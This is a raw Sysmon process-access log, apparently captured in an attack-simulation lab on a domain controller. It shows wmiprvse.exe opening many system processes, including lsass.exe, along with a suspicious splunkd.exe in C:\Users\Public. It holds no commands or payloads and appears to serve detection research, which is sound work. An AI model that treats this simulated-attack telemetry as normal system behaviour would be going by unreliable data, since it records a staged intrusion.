15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025722Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025721Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025720Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.725{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025719Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025718Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025717Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025716Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025715Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025714Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025713Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025712Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025711Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025710Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025709Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025708Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025707Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025706Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.710{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025705Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5E06-00000000A301}7124C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025704Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:32.678{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5363-6008-5D06-00000000A301}6844C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025703Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 